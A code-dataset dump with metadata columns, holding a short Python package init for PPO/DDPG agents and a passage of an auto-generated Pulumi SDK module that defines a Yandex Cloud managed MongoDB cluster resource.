hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8fda52d5e9720af48f2897afff48eb8a703faa4e | 93 | py | Python | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | agent/continuous/seperate/__init__.py | kcs93023/tensorflow_RL | b497890444961b34cb24f072a964edc9575d6ce8 | [
"MIT"
] | null | null | null | from agent.continuous.seperate.ppo import PPO
from agent.continuous.seperate.ddpg import DDPG | 46.5 | 47 | 0.860215 | 14 | 93 | 5.714286 | 0.5 | 0.225 | 0.475 | 0.675 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075269 | 93 | 2 | 47 | 46.5 | 0.930233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
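The `content` field of the row above is a two-line package `__init__.py` that re-exports the `PPO` and `DDPG` agent classes from their submodules. A minimal sketch of the import pattern this enables, assuming the `tensorflow_RL` repository is on the Python path; the snippet is illustrative only:

```python
# Because agent/continuous/seperate/__init__.py re-exports both classes,
# callers can import the agents from the package root instead of spelling
# out the submodule paths (agent.continuous.seperate.ppo / .ddpg).
from agent.continuous.seperate import PPO, DDPG
```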
8ffa243be1a0eace0ee93d61c5e44a6a94c25c74 | 48,363 | py | Python | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2021-04-20T15:39:41.000Z | 2022-02-20T09:14:39.000Z | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | 56 | 2021-04-20T11:31:03.000Z | 2022-03-31T15:53:06.000Z | sdk/python/pulumi_yandex/mdb_mongodb_cluster.py | pulumi/pulumi-yandex | 559a0c82fd2b834bb5f1dc3abbf0dab689b13a3e | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MdbMongodbClusterArgs', 'MdbMongodbCluster']
@pulumi.input_type
class MdbMongodbClusterArgs:
def __init__(__self__, *,
cluster_config: pulumi.Input['MdbMongodbClusterClusterConfigArgs'],
databases: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]],
environment: pulumi.Input[str],
hosts: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]],
network_id: pulumi.Input[str],
resources: pulumi.Input['MdbMongodbClusterResourcesArgs'],
users: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]],
cluster_id: Optional[pulumi.Input[str]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a MdbMongodbCluster resource.
:param pulumi.Input['MdbMongodbClusterClusterConfigArgs'] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] network_id: ID of the network to which the MongoDB cluster belongs.
:param pulumi.Input['MdbMongodbClusterResourcesArgs'] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]] users: A user of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: Name of the MongoDB cluster.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of IDs of security groups assigned to hosts of the cluster.
"""
pulumi.set(__self__, "cluster_config", cluster_config)
pulumi.set(__self__, "databases", databases)
pulumi.set(__self__, "environment", environment)
pulumi.set(__self__, "hosts", hosts)
pulumi.set(__self__, "network_id", network_id)
pulumi.set(__self__, "resources", resources)
pulumi.set(__self__, "users", users)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if description is not None:
pulumi.set(__self__, "description", description)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> pulumi.Input['MdbMongodbClusterClusterConfigArgs']:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@cluster_config.setter
def cluster_config(self, value: pulumi.Input['MdbMongodbClusterClusterConfigArgs']):
pulumi.set(self, "cluster_config", value)
@property
@pulumi.getter
def databases(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter
def environment(self) -> pulumi.Input[str]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@environment.setter
def environment(self, value: pulumi.Input[str]):
pulumi.set(self, "environment", value)
@property
@pulumi.getter
def hosts(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Input[str]:
"""
ID of the network to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: pulumi.Input[str]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter
def resources(self) -> pulumi.Input['MdbMongodbClusterResourcesArgs']:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: pulumi.Input['MdbMongodbClusterResourcesArgs']):
pulumi.set(self, "resources", value)
@property
@pulumi.getter
def users(self) -> pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]):
pulumi.set(self, "users", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]:
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the MongoDB cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of IDs of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@pulumi.input_type
class _MdbMongodbClusterState:
def __init__(__self__, *,
cluster_config: Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
created_at: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
health: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
sharded: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]] = None):
"""
Input properties used for looking up and filtering MdbMongodbCluster resources.
:param pulumi.Input['MdbMongodbClusterClusterConfigArgs'] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[str] created_at: Creation timestamp of the cluster.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[str] health: Aggregated health of the cluster.
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: Name of the MongoDB cluster.
:param pulumi.Input[str] network_id: ID of the network to which the MongoDB cluster belongs.
:param pulumi.Input['MdbMongodbClusterResourcesArgs'] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of IDs of security groups assigned to hosts of the cluster.
:param pulumi.Input[bool] sharded: Whether sharding (MongoDB cluster mode) is enabled.
:param pulumi.Input[str] status: Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
:param pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]] users: A user of the MongoDB cluster. The structure is documented below.
"""
if cluster_config is not None:
pulumi.set(__self__, "cluster_config", cluster_config)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if created_at is not None:
pulumi.set(__self__, "created_at", created_at)
if databases is not None:
pulumi.set(__self__, "databases", databases)
if deletion_protection is not None:
pulumi.set(__self__, "deletion_protection", deletion_protection)
if description is not None:
pulumi.set(__self__, "description", description)
if environment is not None:
pulumi.set(__self__, "environment", environment)
if folder_id is not None:
pulumi.set(__self__, "folder_id", folder_id)
if health is not None:
pulumi.set(__self__, "health", health)
if hosts is not None:
pulumi.set(__self__, "hosts", hosts)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if maintenance_window is not None:
pulumi.set(__self__, "maintenance_window", maintenance_window)
if name is not None:
pulumi.set(__self__, "name", name)
if network_id is not None:
pulumi.set(__self__, "network_id", network_id)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if sharded is not None:
pulumi.set(__self__, "sharded", sharded)
if status is not None:
pulumi.set(__self__, "status", status)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']]:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@cluster_config.setter
def cluster_config(self, value: Optional[pulumi.Input['MdbMongodbClusterClusterConfigArgs']]):
pulumi.set(self, "cluster_config", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp of the cluster.
"""
return pulumi.get(self, "created_at")
@created_at.setter
def created_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_at", value)
@property
@pulumi.getter
def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@databases.setter
def databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterDatabaseArgs']]]]):
pulumi.set(self, "databases", value)
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
"""
return pulumi.get(self, "deletion_protection")
@deletion_protection.setter
def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deletion_protection", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def environment(self) -> Optional[pulumi.Input[str]]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@environment.setter
def environment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "environment", value)
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@folder_id.setter
def folder_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "folder_id", value)
@property
@pulumi.getter
def health(self) -> Optional[pulumi.Input[str]]:
"""
Aggregated health of the cluster.
"""
return pulumi.get(self, "health")
@health.setter
def health(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health", value)
@property
@pulumi.getter
def hosts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterHostArgs']]]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]:
return pulumi.get(self, "maintenance_window")
@maintenance_window.setter
def maintenance_window(self, value: Optional[pulumi.Input['MdbMongodbClusterMaintenanceWindowArgs']]):
pulumi.set(self, "maintenance_window", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the MongoDB cluster.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="networkId")
def network_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the network to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@network_id.setter
def network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network_id", value)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']]:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['MdbMongodbClusterResourcesArgs']]):
pulumi.set(self, "resources", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of IDs of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter
def sharded(self) -> Optional[pulumi.Input[bool]]:
"""
Whether sharding (MongoDB cluster mode) is enabled.
"""
return pulumi.get(self, "sharded")
@sharded.setter
def sharded(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "sharded", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MdbMongodbClusterUserArgs']]]]):
pulumi.set(self, "users", value)
class MdbMongodbCluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None,
__props__=None):
"""
Manages a MongoDB cluster within the Yandex.Cloud. For more information, see
[the official documentation](https://cloud.yandex.com/docs/managed-mongodb/concepts).
## Example Usage
Example of creating a single-node MongoDB cluster.
```python
import pulumi
import pulumi_yandex as yandex
foo_vpc_network = yandex.VpcNetwork("fooVpcNetwork")
foo_vpc_subnet = yandex.VpcSubnet("fooVpcSubnet",
network_id=foo_vpc_network.id,
v4_cidr_blocks=["10.1.0.0/24"],
zone="ru-central1-a")
foo_mdb_mongodb_cluster = yandex.MdbMongodbCluster("fooMdbMongodbCluster",
cluster_config=yandex.MdbMongodbClusterClusterConfigArgs(
version="4.2",
),
databases=[yandex.MdbMongodbClusterDatabaseArgs(
name="testdb",
)],
environment="PRESTABLE",
hosts=[yandex.MdbMongodbClusterHostArgs(
subnet_id=foo_vpc_subnet.id,
zone_id="ru-central1-a",
)],
labels={
"test_key": "test_value",
},
maintenance_window=yandex.MdbMongodbClusterMaintenanceWindowArgs(
type="ANYTIME",
),
network_id=foo_vpc_network.id,
resources=yandex.MdbMongodbClusterResourcesArgs(
disk_size=16,
disk_type_id="network-hdd",
resource_preset_id="b1.nano",
),
users=[yandex.MdbMongodbClusterUserArgs(
name="john",
password="password",
permissions=[yandex.MdbMongodbClusterUserPermissionArgs(
database_name="testdb",
)],
)])
```
## Import
A cluster can be imported using the `id` of the resource, e.g.
```sh
$ pulumi import yandex:index/mdbMongodbCluster:MdbMongodbCluster foo cluster_id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
